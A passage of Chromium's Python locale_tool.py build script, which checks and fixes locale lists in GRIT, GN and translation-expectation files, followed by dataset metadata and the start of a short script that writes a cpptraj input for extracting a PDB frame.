android_apk_omitted_locales,
"json")
write_file(_filename + ".ios_unsupported_locales",
ios_unsupported_locales,
"json")
''')
# Copy build/config/locales.gni to the workspace, as required by BUILD.gn.
shutil.copyfile(os.path.join(_TOP_SRC_DIR, 'build', 'config', 'locales.gni'),
os.path.join(work_dir, 'locales.gni'))
# Create output directory.
out_path = os.path.join(work_dir, out_subdir_name)
os.mkdir(out_path)
# And ... we're good.
return out_path
# Set this global variable to the path of a given temporary directory
# before calling _ExtractAllChromeLocalesLists() if you want to debug
# the locales list extraction process.
_DEBUG_LOCALES_WORK_DIR = None
def _ReadJsonList(file_path):
"""Read a JSON file that must contain a list, and return it."""
with open(file_path) as f:
data = json.load(f)
assert isinstance(data, list), "JSON file %s is not a list!" % file_path
return [item.encode('utf8') for item in data]
def _ExtractAllChromeLocalesLists():
with build_utils.TempDir() as tmp_path:
if _DEBUG_LOCALES_WORK_DIR:
tmp_path = _DEBUG_LOCALES_WORK_DIR
build_utils.DeleteDirectory(tmp_path)
build_utils.MakeDirectory(tmp_path)
out_path = _PrepareTinyGnWorkspace(tmp_path, 'out')
# NOTE: The file suffixes used here should be kept in sync with
# build/config/locales.gni
gn_executable = _FindGnExecutable()
try:
subprocess.check_output(
[gn_executable, 'gen', out_path, '--root=' + tmp_path])
except subprocess.CalledProcessError as e:
print(e.output)
raise e
global _INTERNAL_CHROME_LOCALES
_INTERNAL_CHROME_LOCALES = _ReadJsonList(
os.path.join(out_path, 'foo.locales'))
global _INTERNAL_ANDROID_APK_OMITTED_LOCALES
_INTERNAL_ANDROID_APK_OMITTED_LOCALES = _ReadJsonList(
os.path.join(out_path, 'foo.android_apk_omitted_locales'))
global _INTERNAL_IOS_UNSUPPORTED_LOCALES
_INTERNAL_IOS_UNSUPPORTED_LOCALES = _ReadJsonList(
os.path.join(out_path, 'foo.ios_unsupported_locales'))
##########################################################################
##########################################################################
#####
##### G R D H E L P E R F U N C T I O N S
#####
##########################################################################
##########################################################################
# Technical note:
#
# Even though .grd files are XML, an xml parser library is not used in order
# to preserve the original file's structure after modification. ElementTree
# tends to re-order attributes in each element when re-writing an XML
# document tree, which is undesirable here.
#
# Thus simple line-based regular expression matching is used instead.
#
# Misc regular expressions used to match elements and their attributes.
_RE_OUTPUT_ELEMENT = re.compile(r'<output (.*)\s*/>')
_RE_TRANSLATION_ELEMENT = re.compile(r'<file( | .* )path="(.*\.xtb)".*/>')
_RE_FILENAME_ATTRIBUTE = re.compile(r'filename="([^"]*)"')
_RE_LANG_ATTRIBUTE = re.compile(r'lang="([^"]*)"')
_RE_PATH_ATTRIBUTE = re.compile(r'path="([^"]*)"')
_RE_TYPE_ANDROID_ATTRIBUTE = re.compile(r'type="android"')
def _IsGritInputFile(input_file):
"""Returns True iff this is a GRIT input file."""
return input_file.endswith('.grd')
def _GetXmlLangAttribute(xml_line):
"""Extract the lang attribute value from an XML input line."""
m = _RE_LANG_ATTRIBUTE.search(xml_line)
if not m:
return None
return m.group(1)
class _GetXmlLangAttributeTest(unittest.TestCase):
TEST_DATA = {
'': None,
'foo': None,
'lang=foo': None,
'lang="foo"': 'foo',
'<something lang="foo bar" />': 'foo bar',
'<file lang="fr-CA" path="path/to/strings_fr-CA.xtb" />': 'fr-CA',
}
def test_GetXmlLangAttribute(self):
for test_line, expected in self.TEST_DATA.iteritems():
self.assertEquals(_GetXmlLangAttribute(test_line), expected)
def _SortGrdElementsRanges(grd_lines, element_predicate):
"""Sort all .grd elements of a given type by their lang attribute."""
return _SortElementsRanges(grd_lines, element_predicate, _GetXmlLangAttribute)
def _CheckGrdElementRangeLang(grd_lines, start, end, wanted_locales):
"""Check the element 'lang' attributes in specific .grd lines range.
This really checks the following:
- Each item has a correct 'lang' attribute.
- There are no duplicated lines for the same 'lang' attribute.
- That there are no extra locales that Chromium doesn't want.
- That no wanted locale is missing.
Args:
grd_lines: Input .grd lines.
start: Sub-range start position in input line list.
end: Sub-range limit position in input line list.
wanted_locales: Set of wanted Chromium locale names.
Returns:
List of error message strings for this input. Empty on success.
"""
errors = []
locales = set()
for pos in xrange(start, end):
line = grd_lines[pos]
lang = _GetXmlLangAttribute(line)
if not lang:
errors.append('%d: Missing "lang" attribute in <output> element' % pos +
1)
continue
cr_locale = _FixChromiumLangAttribute(lang)
if cr_locale in locales:
errors.append(
'%d: Redefinition of <output> for "%s" locale' % (pos + 1, lang))
locales.add(cr_locale)
extra_locales = locales.difference(wanted_locales)
if extra_locales:
errors.append('%d-%d: Extra locales found: %s' % (start + 1, end + 1,
sorted(extra_locales)))
missing_locales = wanted_locales.difference(locales)
if missing_locales:
errors.append('%d-%d: Missing locales: %s' % (start + 1, end + 1,
sorted(missing_locales)))
return errors
##########################################################################
##########################################################################
#####
##### G R D A N D R O I D O U T P U T S
#####
##########################################################################
##########################################################################
def _IsGrdAndroidOutputLine(line):
"""Returns True iff this is an Android-specific <output> line."""
m = _RE_OUTPUT_ELEMENT.search(line)
if m:
return 'type="android"' in m.group(1)
return False
assert _IsGrdAndroidOutputLine(' <output type="android"/>')
# Many of the functions below have unused arguments due to genericity.
# pylint: disable=unused-argument
def _CheckGrdElementRangeAndroidOutputFilename(grd_lines, start, end,
wanted_locales):
"""Check all <output> elements in specific input .grd lines range.
This really checks the following:
- Filenames exist for each listed locale.
- Filenames are well-formed.
Args:
grd_lines: Input .grd lines.
start: Sub-range start position in input line list.
end: Sub-range limit position in input line list.
wanted_locales: Set of wanted Chromium locale names.
Returns:
List of error message strings for this input. Empty on success.
"""
errors = []
for pos in xrange(start, end):
line = grd_lines[pos]
lang = _GetXmlLangAttribute(line)
if not lang:
continue
cr_locale = _FixChromiumLangAttribute(lang)
m = _RE_FILENAME_ATTRIBUTE.search(line)
if not m:
errors.append('%d: Missing filename attribute in <output> element' %
(pos + 1))
else:
filename = m.group(1)
if not filename.endswith('.xml'):
errors.append(
'%d: Filename should end with ".xml": %s' % (pos + 1, filename))
dirname = os.path.basename(os.path.dirname(filename))
prefix = ('values-%s' % resource_utils.ToAndroidLocaleName(cr_locale)
if cr_locale != _DEFAULT_LOCALE else 'values')
if dirname != prefix:
errors.append(
'%d: Directory name should be %s: %s' % (pos + 1, prefix, filename))
return errors
def _CheckGrdAndroidOutputElements(grd_file, grd_lines, wanted_locales):
"""Check all <output> elements related to Android.
Args:
grd_file: Input .grd file path.
grd_lines: List of input .grd lines.
wanted_locales: set of wanted Chromium locale names.
Returns:
List of error message strings. Empty on success.
"""
intervals = _BuildIntervalList(grd_lines, _IsGrdAndroidOutputLine)
errors = []
for start, end in intervals:
errors += _CheckGrdElementRangeLang(grd_lines, start, end, wanted_locales)
errors += _CheckGrdElementRangeAndroidOutputFilename(grd_lines, start, end,
wanted_locales)
return errors
def _AddMissingLocalesInGrdAndroidOutputs(grd_file, grd_lines, wanted_locales):
"""Fix an input .grd line by adding missing Android outputs.
Args:
grd_file: Input .grd file path.
grd_lines: Input .grd line list.
wanted_locales: set of Chromium locale names.
Returns:
A new list of .grd lines, containing new <output> elements when needed
for locales from |wanted_locales| that were not part of the input.
"""
intervals = _BuildIntervalList(grd_lines, _IsGrdAndroidOutputLine)
for start, end in reversed(intervals):
locales = set()
for pos in xrange(start, end):
lang = _GetXmlLangAttribute(grd_lines[pos])
locale = _FixChromiumLangAttribute(lang)
locales.add(locale)
missing_locales = wanted_locales.difference(locales)
if not missing_locales:
continue
src_locale = 'bg'
src_lang_attribute = 'lang="%s"' % src_locale
src_line = None
for pos in xrange(start, end):
if src_lang_attribute in grd_lines[pos]:
src_line = grd_lines[pos]
break
if not src_line:
raise Exception(
'Cannot find <output> element with "%s" lang attribute' % src_locale)
line_count = end - 1
for locale in missing_locales:
android_locale = resource_utils.ToAndroidLocaleName(locale)
dst_line = src_line.replace(
'lang="%s"' % src_locale, 'lang="%s"' % locale).replace(
'values-%s/' % src_locale, 'values-%s/' % android_locale)
grd_lines.insert(line_count, dst_line)
line_count += 1
# Sort the new <output> elements.
return _SortGrdElementsRanges(grd_lines, _IsGrdAndroidOutputLine)
##########################################################################
##########################################################################
#####
##### G R D T R A N S L A T I O N S
#####
##########################################################################
##########################################################################
def _IsTranslationGrdOutputLine(line):
"""Returns True iff this is an output .xtb <file> element."""
m = _RE_TRANSLATION_ELEMENT.search(line)
return m is not None
class _IsTranslationGrdOutputLineTest(unittest.TestCase):
def test_GrdTranslationOutputLines(self):
_VALID_INPUT_LINES = [
'<file path="foo/bar.xtb" />',
'<file path="foo/bar.xtb"/>',
'<file lang="fr-CA" path="translations/aw_strings_fr-CA.xtb"/>',
'<file lang="fr-CA" path="translations/aw_strings_fr-CA.xtb" />',
' <file path="translations/aw_strings_ar.xtb" lang="ar" />',
]
_INVALID_INPUT_LINES = ['<file path="foo/bar.xml" />']
for line in _VALID_INPUT_LINES:
self.assertTrue(
_IsTranslationGrdOutputLine(line),
'_IsTranslationGrdOutputLine() returned False for [%s]' % line)
for line in _INVALID_INPUT_LINES:
self.assertFalse(
_IsTranslationGrdOutputLine(line),
'_IsTranslationGrdOutputLine() returned True for [%s]' % line)
def _CheckGrdTranslationElementRange(grd_lines, start, end,
wanted_locales):
"""Check all <translations> sub-elements in specific input .grd lines range.
This really checks the following:
- Each item has a 'path' attribute.
- Each such path value ends up with '.xtb'.
Args:
grd_lines: Input .grd lines.
start: Sub-range start position in input line list.
end: Sub-range limit position in input line list.
wanted_locales: Set of wanted Chromium locale names.
Returns:
List of error message strings for this input. Empty on success.
"""
errors = []
for pos in xrange(start, end):
line = grd_lines[pos]
lang = _GetXmlLangAttribute(line)
if not lang:
continue
m = _RE_PATH_ATTRIBUTE.search(line)
if not m:
errors.append('%d: Missing path attribute in <file> element' % (pos + 1))
else:
filename = m.group(1)
if not filename.endswith('.xtb'):
errors.append(
'%d: Path should end with ".xtb": %s' % (pos + 1, filename))
return errors
def _CheckGrdTranslations(grd_file, grd_lines, wanted_locales):
"""Check all <file> elements that correspond to an .xtb output file.
Args:
grd_file: Input .grd file path.
grd_lines: List of input .grd lines.
wanted_locales: set of wanted Chromium locale names.
Returns:
List of error message strings. Empty on success.
"""
wanted_locales = wanted_locales - set([_DEFAULT_LOCALE])
intervals = _BuildIntervalList(grd_lines, _IsTranslationGrdOutputLine)
errors = []
for start, end in intervals:
errors += _CheckGrdElementRangeLang(grd_lines, start, end, wanted_locales)
errors += _CheckGrdTranslationElementRange(grd_lines, start, end,
wanted_locales)
return errors
# Regular expression used to replace the lang attribute inside .xtb files.
_RE_TRANSLATIONBUNDLE = re.compile('<translationbundle lang="(.*)">')
def _CreateFakeXtbFileFrom(src_xtb_path, dst_xtb_path, dst_locale):
"""Create a fake .xtb file.
Args:
src_xtb_path: Path to source .xtb file to copy from.
dst_xtb_path: Path to destination .xtb file to write to.
dst_locale: Destination locale, the lang attribute in the source file
will be substituted with this value before its lines are written
to the destination file.
"""
with open(src_xtb_path) as f:
src_xtb_lines = f.readlines()
def replace_xtb_lang_attribute(line):
m = _RE_TRANSLATIONBUNDLE.search(line)
if not m:
return line
return line[:m.start(1)] + dst_locale + line[m.end(1):]
dst_xtb_lines = [replace_xtb_lang_attribute(line) for line in src_xtb_lines]
with build_utils.AtomicOutput(dst_xtb_path) as tmp:
tmp.writelines(dst_xtb_lines)
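# For example, when dst_locale is 'fr', a source line such as
#   <translationbundle lang="en-GB">
# is rewritten as
#   <translationbundle lang="fr">
# before being written to the destination file.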
def _AddMissingLocalesInGrdTranslations(grd_file, grd_lines, wanted_locales):
"""Fix an input .grd line by adding missing Android outputs.
This also creates fake .xtb files from the one provided for 'en-GB'.
Args:
grd_file: Input .grd file path.
grd_lines: Input .grd line list.
wanted_locales: set of Chromium locale names.
Returns:
A new list of .grd lines, containing new <file> elements when needed
for locales from |wanted_locales| that were not part of the input.
"""
wanted_locales = wanted_locales - set([_DEFAULT_LOCALE])
intervals = _BuildIntervalList(grd_lines, _IsTranslationGrdOutputLine)
for start, end in reversed(intervals):
locales = set()
for pos in xrange(start, end):
lang = _GetXmlLangAttribute(grd_lines[pos])
locale = _FixChromiumLangAttribute(lang)
locales.add(locale)
missing_locales = wanted_locales.difference(locales)
if not missing_locales:
continue
src_locale = 'en-GB'
src_lang_attribute = 'lang="%s"' % src_locale
src_line = None
for pos in xrange(start, end):
if src_lang_attribute in grd_lines[pos]:
src_line = grd_lines[pos]
break
if not src_line:
raise Exception(
'Cannot find <file> element with "%s" lang attribute' % src_locale)
src_path = os.path.join(
os.path.dirname(grd_file),
_RE_PATH_ATTRIBUTE.search(src_line).group(1))
line_count = end - 1
for locale in missing_locales:
dst_line = src_line.replace(
'lang="%s"' % src_locale, 'lang="%s"' % locale).replace(
'_%s.xtb' % src_locale, '_%s.xtb' % locale)
grd_lines.insert(line_count, dst_line)
line_count += 1
dst_path = src_path.replace('_%s.xtb' % src_locale, '_%s.xtb' % locale)
_CreateFakeXtbFileFrom(src_path, dst_path, locale)
# Sort the new <file> elements.
return _SortGrdElementsRanges(grd_lines, _IsTranslationGrdOutputLine)
##########################################################################
##########################################################################
#####
##### G N A N D R O I D O U T P U T S
#####
##########################################################################
##########################################################################
_RE_GN_VALUES_LIST_LINE = re.compile(
r'^\s*".*values(\-([A-Za-z0-9-]+))?/.*\.xml",\s*$')
def _IsBuildGnInputFile(input_file):
"""Returns True iff this is a BUILD.gn file."""
return os.path.basename(input_file) == 'BUILD.gn'
def _GetAndroidGnOutputLocale(line):
"""Check a GN list, and return its Android locale if it is an output .xml"""
m = _RE_GN_VALUES_LIST_LINE.match(line)
if not m:
return None
if m.group(1): # First group is optional and contains group 2.
return m.group(2)
return resource_utils.ToAndroidLocaleName(_DEFAULT_LOCALE)
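# Illustrative inputs (hypothetical file names):
#   '  "res/values-cs/strings.xml",'  -> 'cs'
#   '  "res/values/strings.xml",'     -> the default locale's Android name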
def _IsAndroidGnOutputLine(line):
"""Returns True iff this is an Android-specific localized .xml output."""
return _GetAndroidGnOutputLocale(line) is not None
def _CheckGnOutputsRangeForLocalizedStrings(gn_lines, start, end):
"""Check that a range of GN lines corresponds to localized strings.
Special case: Some BUILD.gn files list several non-localized .xml files
that should be ignored by this function, e.g. in
components/cronet/android/BUILD.gn, the following appears:
inputs = [
...
"sample/res/layout/activity_main.xml",
"sample/res/layout/dialog_url.xml",
"sample/res/values/dimens.xml",
"sample/res/values/strings.xml",
...
]
These are non-localized strings, and should be ignored. This function is
used to detect them quickly.
"""
for pos in xrange(start, end):
if 'values/' not in gn_lines[pos]:
return True
return False
def _CheckGnOutputsRange(gn_lines, start, end, wanted_locales):
if not _CheckGnOutputsRangeForLocalizedStrings(gn_lines, start, end):
return []
errors = []
locales = set()
for pos in xrange(start, end):
line = gn_lines[pos]
android_locale = _GetAndroidGnOutputLocale(line)
assert android_locale is not None
cr_locale = resource_utils.ToChromiumLocaleName(android_locale)
if cr_locale in locales:
errors.append('%d: Redefinition of output for "%s" locale' %
(pos + 1, android_locale))
locales.add(cr_locale)
extra_locales = locales.difference(wanted_locales)
if extra_locales:
errors.append('%d-%d: Extra locales: %s' % (start + 1, end + 1,
sorted(extra_locales)))
missing_locales = wanted_locales.difference(locales)
if missing_locales:
errors.append('%d-%d: Missing locales: %s' % (start + 1, end + 1,
sorted(missing_locales)))
return errors
def _CheckGnAndroidOutputs(gn_file, gn_lines, wanted_locales):
intervals = _BuildIntervalList(gn_lines, _IsAndroidGnOutputLine)
errors = []
for start, end in intervals:
errors += _CheckGnOutputsRange(gn_lines, start, end, wanted_locales)
return errors
def _AddMissingLocalesInGnAndroidOutputs(gn_file, gn_lines, wanted_locales):
intervals = _BuildIntervalList(gn_lines, _IsAndroidGnOutputLine)
# NOTE: Since this may insert new lines to each interval, process the
# list in reverse order to maintain valid (start,end) positions during
# the iteration.
for start, end in reversed(intervals):
if not _CheckGnOutputsRangeForLocalizedStrings(gn_lines, start, end):
continue
locales = set()
for pos in xrange(start, end):
lang = _GetAndroidGnOutputLocale(gn_lines[pos])
locale = resource_utils.ToChromiumLocaleName(lang)
locales.add(locale)
missing_locales = wanted_locales.difference(locales)
if not missing_locales:
continue
src_locale = 'bg'
src_values = 'values-%s/' % resource_utils.ToAndroidLocaleName(src_locale)
src_line = None
for pos in xrange(start, end):
if src_values in gn_lines[pos]:
src_line = gn_lines[pos]
break
if not src_line:
raise Exception(
'Cannot find output list item with "%s" locale' % src_locale)
line_count = end - 1
for locale in missing_locales:
if locale == _DEFAULT_LOCALE:
dst_line = src_line.replace('values-%s/' % src_locale, 'values/')
else:
dst_line = src_line.replace(
'values-%s/' % src_locale,
'values-%s/' % resource_utils.ToAndroidLocaleName(locale))
gn_lines.insert(line_count, dst_line)
line_count += 1
gn_lines = _SortListSubRange(
gn_lines, start, line_count,
lambda line: _RE_GN_VALUES_LIST_LINE.match(line).group(1))
return gn_lines
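# For illustration (hypothetical file name), with src_locale 'bg' a line like
#   '  "java/res/values-bg/android_chrome_strings.xml",'
# is duplicated as
#   '  "java/res/values-cs/android_chrome_strings.xml",'
# for a missing 'cs' locale, then the sub-range is re-sorted.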
##########################################################################
##########################################################################
#####
##### T R A N S L A T I O N E X P E C T A T I O N S
#####
##########################################################################
##########################################################################
_EXPECTATIONS_FILENAME = 'translation_expectations.pyl'
# Technical note: the format of translation_expectations.pyl
# is a 'Python literal', which defines a Python dictionary, so should be
# be easy to parse. However, when modifying it, care should be taken
# to respect the line comments and the order of keys within the text
# file.
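# For illustration, such a file might contain (hypothetical contents):
#   {
#     "android_grd": {
#       "languages": ["am", "ar", "bg"],
#     },
#   }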
def _ReadPythonLiteralFile(pyl_path):
"""Read a .pyl file into a Python data structure."""
with open(pyl_path) as f:
pyl_content = f.read()
# Evaluate as a Python data structure, use an empty global
# and local dictionary.
return eval(pyl_content, dict(), dict())
def _UpdateLocalesInExpectationLines(pyl_lines,
wanted_locales,
available_width=79):
"""Update the locales list(s) found in an expectations file.
Args:
pyl_lines: Iterable of input lines from the file.
wanted_locales: Set or list of new locale names.
available_width: Optional, number of character columns used
to word-wrap the new list items.
Returns:
New list of updated lines.
"""
locales_list = ['"%s"' % loc for loc in sorted(wanted_locales)]
result = []
line_count = len(pyl_lines)
line_num = 0
DICT_START = '"languages": ['
while line_num < line_count:
line = pyl_lines[line_num]
line_num += 1
result.append(line)
# Look for start of "languages" dictionary.
pos = line.find(DICT_START)
if pos < 0:
continue
start_margin = pos
start_line = line_num
# Skip over all lines from the list.
while (line_num < line_count and
not pyl_lines[line_num].rstrip().endswith('],')):
line_num += 1
continue
if line_num == line_count:
raise Exception('%d: Missing list termination!' % start_line)
# Format the new list according to the new margin.
locale_width = available_width - (start_margin + 2)
locale_lines = _PrettyPrintListAsLines(
locales_list, locale_width, trailing_comma=True)
for locale_line in locale_lines:
result.append(' ' * (start_margin + 2) + locale_line)
result.append(' ' * start_margin + '],')
line_num += 1
return result
class _UpdateLocalesInExpectationLinesTest(unittest.TestCase):
def test_simple(self):
self.maxDiff = 1000
input_text = r'''
# This comment should be preserved
# 23456789012345678901234567890123456789
{
"android_grd": {
"languages": [
"aa", "bb", "cc", "dd", "ee",
"ff", "gg", "hh", "ii", "jj",
"kk"],
},
# Example with bad indentation in input.
"another_grd": {
"languages": [
"aa", "bb", "cc", "dd", "ee", "ff", "gg", "hh", "ii", "jj", "kk",
],
},
}
'''
expected_text = r'''
# This comment should be preserved
# 23456789012345678901234567890123456789
{
"android_grd": {
"languages": [
"A2", "AA", "BB", "CC", "DD",
"E2", "EE", "FF", "GG", "HH",
"I2", "II", "JJ", "KK",
],
},
# Example with bad indentation in input.
"another_grd": {
"languages": [
"A2", "AA", "BB", "CC", "DD",
"E2", "EE", "FF", "GG", "HH",
"I2", "II", "JJ", "KK",
],
},
}
'''
input_lines = input_text.splitlines()
test_locales = ([
'AA', 'BB', 'CC', 'DD', 'EE', 'FF', 'GG', 'HH', 'II', 'JJ', 'KK', 'A2',
'E2', 'I2'
])
expected_lines = expected_text.splitlines()
self.assertListEqual(
_UpdateLocalesInExpectationLines(input_lines, test_locales, 40),
expected_lines)
def test_missing_list_termination(self):
input_lines = r'''
"languages": ['
"aa", "bb", "cc", "dd"
'''.splitlines()
with self.assertRaises(Exception) as cm:
_UpdateLocalesInExpectationLines(input_lines, ['a', 'b'], 40)
self.assertEqual(str(cm.exception), '2: Missing list termination!')
def _UpdateLocalesInExpectationFile(pyl_path, wanted_locales):
"""Update all locales listed in a given expectations file.
Args:
pyl_path: Path to .pyl file to update.
wanted_locales: List of locales that need to be written to
the file.
"""
tc_locales = {
_FixTranslationConsoleLocaleName(locale)
for locale in set(wanted_locales) - set([_DEFAULT_LOCALE])
}
with open(pyl_path) as f:
input_lines = [l.rstrip() for l in f.readlines()]
updated_lines = _UpdateLocalesInExpectationLines(input_lines, tc_locales)
with build_utils.AtomicOutput(pyl_path) as f:
f.writelines('\n'.join(updated_lines) + '\n')
##########################################################################
##########################################################################
#####
##### C H E C K E V E R Y T H I N G
#####
##########################################################################
##########################################################################
# pylint: enable=unused-argument
def _IsAllInputFile(input_file):
return _IsGritInputFile(input_file) or _IsBuildGnInputFile(input_file)
def _CheckAllFiles(input_file, input_lines, wanted_locales):
errors = []
if _IsGritInputFile(input_file):
errors += _CheckGrdTranslations(input_file, input_lines, wanted_locales)
errors += _CheckGrdAndroidOutputElements(
input_file, input_lines, wanted_locales)
elif _IsBuildGnInputFile(input_file):
errors += _CheckGnAndroidOutputs(input_file, input_lines, wanted_locales)
return errors
def _AddMissingLocalesInAllFiles(input_file, input_lines, wanted_locales):
if _IsGritInputFile(input_file):
lines = _AddMissingLocalesInGrdTranslations(
input_file, input_lines, wanted_locales)
lines = _AddMissingLocalesInGrdAndroidOutputs(
input_file, lines, wanted_locales)
elif _IsBuildGnInputFile(input_file):
lines = _AddMissingLocalesInGnAndroidOutputs(
input_file, input_lines, wanted_locales)
return lines
##########################################################################
##########################################################################
#####
##### C O M M A N D H A N D L I N G
#####
##########################################################################
##########################################################################
class _Command(object):
"""A base class for all commands recognized by this script.
Usage is the following:
1) Derived classes must re-define the following class-based fields:
- name: Command name (e.g. 'list-locales')
- description: Command short description.
- long_description: Optional. Command long description.
NOTE: As a convenience, if the first character is a newline,
it will be omitted in the help output.
2) Derived classes for commands that take arguments should override
RegisterExtraArgs(), which receives a corresponding argparse
sub-parser as argument.
3) Derived classes should implement a Run() command, which can read
the current arguments from self.args.
"""
name = None
description = None
long_description = None
def __init__(self):
self._parser = None
self.args = None
def RegisterExtraArgs(self, subparser):
pass
def RegisterArgs(self, parser):
subp = parser.add_parser(
self.name, help=self.description,
description=self.long_description or self.description,
formatter_class=argparse.RawDescriptionHelpFormatter)
self._parser = subp
subp.set_defaults(command=self)
group = subp.add_argument_group('%s arguments' % self.name)
self.RegisterExtraArgs(group)
def ProcessArgs(self, args):
self.args = args
class _ListLocalesCommand(_Command):
"""Implement the 'list-locales' command to list locale lists of interest."""
name = 'list-locales'
description = 'List supported Chrome locales'
long_description = r'''
List locales of interest, by default this prints all locales supported by
Chrome, but `--type=android_apk_omitted` can be used to print the list of
locales omitted from Android APKs (but not app bundles), and
`--type=ios_unsupported` for the list of locales unsupported on iOS.
These values are extracted directly from build/config/locales.gni.
Additionally, use the --as-json argument to print the list as a JSON list,
instead of the default format (which is a space-separated list of locale names).
'''
# Maps type argument to a function returning the corresponding locales list.
TYPE_MAP = {
'all': ChromeLocales,
'android_apk_omitted': AndroidAPKOmittedLocales,
'ios_unsupported': IosUnsupportedLocales,
}
def RegisterExtraArgs(self, group):
group.add_argument(
'--as-json',
action='store_true',
help='Output as JSON list.')
group.add_argument(
'--type',
choices=tuple(self.TYPE_MAP.viewkeys()),
default='all',
help='Select type of locale list to print.')
def Run(self):
locale_list = self.TYPE_MAP[self.args.type]()
if self.args.as_json:
print('[%s]' % ", ".join('"%s"' % loc for loc in locale_list))
else:
print(' '.join(locale_list))
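# Illustrative invocations of the command above (paths relative to the
# source tree root; assuming this script lives at build/locale_tool.py):
#   build/locale_tool.py list-locales --type=ios_unsupported
#   build/locale_tool.py list-locales --as-json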
class _CheckInputFileBaseCommand(_Command):
"""Used as a base for other _Command subclasses that check input files.
Subclasses should also define the following class-level variables:
- select_file_func:
A predicate that receives a file name (not path) and return True if it
should be selected for inspection. Used when scanning directories with
'--scan-dir <dir>'.
- check_func:
- fix_func:
Two functions passed as parameters to _ProcessFile(), see relevant
documentation in this function's definition.
"""
select_file_func = None
check_func = None
fix_func = None
def RegisterExtraArgs(self, group):
group.add_argument(
'--scan-dir',
action='append',
help='Optional directory to scan for input files recursively.')
group.add_argument(
'input',
nargs='*',
help='Input file(s) to check.')
group.add_argument(
'--fix-inplace',
action='store_true',
help='Try to fix the files in-place too.')
group.add_argument(
'--add-locales',
help='Space-separated list of additional locales to use')
def Run(self):
args = self.args
input_files = []
if args.input:
input_files = args.input
if args.scan_dir:
input_files.extend(_ScanDirectoriesForFiles(
args.scan_dir, self.select_file_func.__func__))
locales = ChromeLocales()
if args.add_locales:
locales.extend(args.add_locales.split(' '))
locales = set(locales)
for input_file in input_files:
_ProcessFile(input_file,
locales,
self.check_func.__func__,
self.fix_func.__func__ if args.fix_inplace else None)
print('%sDone.' % (_CONSOLE_START_LINE))
class _CheckGrdAndroidOutputsCommand(_CheckInputFileBaseCommand):
name = 'check-grd-android-outputs'
description = (
'Check the Android resource (.xml) files outputs in GRIT input files.')
long_description = r'''
Check the Android .xml files outputs in one or more input GRIT (.grd) files
for the following conditions:
- Each item has a correct 'lang' attribute.
- There are no duplicated lines for the same 'lang' attribute.
- That there are no extra locales that Chromium doesn't want.
- That no wanted locale is missing.
- Filenames exist for each listed locale.
- Filenames are well-formed.
'''
select_file_func = _IsGritInputFile
check_func = _CheckGrdAndroidOutputElements
fix_func = _AddMissingLocalesInGrdAndroidOutputs
class _CheckGrdTranslationsCommand(_CheckInputFileBaseCommand):
name = 'check-grd-translations'
description = (
'Check the translation (.xtb) files produced by .grd input files.')
long_description = r'''
Check the translation (.xtb) file outputs in one or more input GRIT (.grd) files
for the following conditions:
- Each item has a correct 'lang' attribute.
- There are no duplicated lines for the same 'lang' attribute.
- That there are no extra locales that Chromium doesn't want.
- That no wanted locale is missing.
- Each item has a 'path' attribute.
- Each such path value ends up with '.xtb'.
'''
select_file_func = _IsGritInputFile
check_func = _CheckGrdTranslations
fix_func = _AddMissingLocalesInGrdTranslations
class _CheckGnAndroidOutputsCommand(_CheckInputFileBaseCommand):
name = 'check-gn-android-outputs'
description = 'Check the Android .xml file lists in GN build files.'
long_description = r'''
Check one or more BUILD.gn file, looking for lists of Android resource .xml
files, and checking that:
- There are no duplicated output files in the list.
- Each output file belongs to a wanted Chromium locale.
- There are no output files for unwanted Chromium locales.
'''
select_file_func = _IsBuildGnInputFile
check_func = _CheckGnAndroidOutputs
fix_func = _AddMissingLocalesInGnAndroidOutputs
class _CheckAllCommand(_CheckInputFileBaseCommand):
name = 'check-all'
description = 'Check everything.'
long_description = 'Equivalent to calling all other check-xxx commands.'
select_file_func = _IsAllInputFile
check_func = _CheckAllFiles
fix_func = _AddMissingLocalesInAllFiles
class _UpdateExpectationsCommand(_Command):
name = 'update-expectations'
description = 'Update translation expectations file.'
long_description = r'''
Update %s files to match the current list of locales supported by Chromium.
This is especially useful to add new locales before updating any GRIT or GN
input file with the --add-locales option.
''' % _EXPECTATIONS_FILENAME
def RegisterExtraArgs(self, group):
group.add_argument(
'--add-locales',
help='Space-separated list of additional locales to use.')
def Run(self):
locales = ChromeLocales()
add_locales = self.args.add_locales
if add_locales:
locales.extend(add_locales.split(' '))
expectation_paths = [
'tools/gritsettings/translation_expectations.pyl',
'clank/tools/translation_expectations.pyl',
]
missing_expectation_files = []
for path in expectation_paths:
file_path = os.path.join(_TOP_SRC_DIR, path)
if not os.path.exists(file_path):
missing_expectation_files.append(file_path)
continue
_UpdateLocalesInExpectationFile(file_path, locales)
if missing_expectation_files:
sys.stderr.write('WARNING: Missing file(s): %s\n' %
(', '.join(missing_expectation_files)))
class _UnitTestsCommand(_Command):
name = 'unit-tests'
description = 'Run internal unit-tests for this script'
def RegisterExtraArgs(self, group):
group.add_argument(
'-v', '--verbose', action='count', help='Increase test verbosity.')
group.add_argument('args', nargs=argparse.REMAINDER)
def Run(self):
argv = [_SCRIPT_NAME] + self.args.args
unittest.main(argv=argv, verbosity=self.args.verbose)
# List of all commands supported by this script.
_COMMANDS = [
_ListLocalesCommand,
_CheckGrdAndroidOutputsCommand,
_CheckGrdTranslationsCommand,
_CheckGnAndroidOutputsCommand,
_CheckAllCommand,
_UpdateExpectationsCommand,
_UnitTestsCommand,
]
def main(argv):
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
subparsers = parser.add_subparsers()
commands = [clazz() for clazz in _COMMANDS]
for command in commands:
command.RegisterArgs(subparsers)
if not argv:
argv = ['--help']
args = parser.parse_args(argv)
args.command.ProcessArgs(args)
args.command.Run()
if __name__ == "__main__":
main(sys.argv[1:])
|
endlessm/chromium-browser
|
build/locale_tool.py
|
Python
|
bsd-3-clause
| 51,300
|
[
"xTB"
] |
35646385c45a01ee503db530012c4f2c53b7a5870acf1bdfd5456f7c0ba3d26c
|
#!/usr/bin/env python
"""
MakePDB
---------
Usage: makepdb.py <title> <parm> <traj>

Writes a cpptraj input script ('getpdb.cpptraj') that extracts the first
frame of a trajectory as <title>.pdb.
"""
import sys
def makepdb(title,parm,traj):
"""
Make pdb file from first frame of a trajectory
"""
cpptrajdic = {'title': title, 'parm': parm, 'traj': traj}
cpptrajscript="""parm {parm}
trajin {traj} 0 1 1
center
rms first @CA,C,N
strip :WAT
strip :Na+
strip :Cl-
trajout {title}.pdb pdb
run
exit"""
return cpptrajscript.format(**cpptrajdic)
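# A minimal usage sketch (hypothetical file names):
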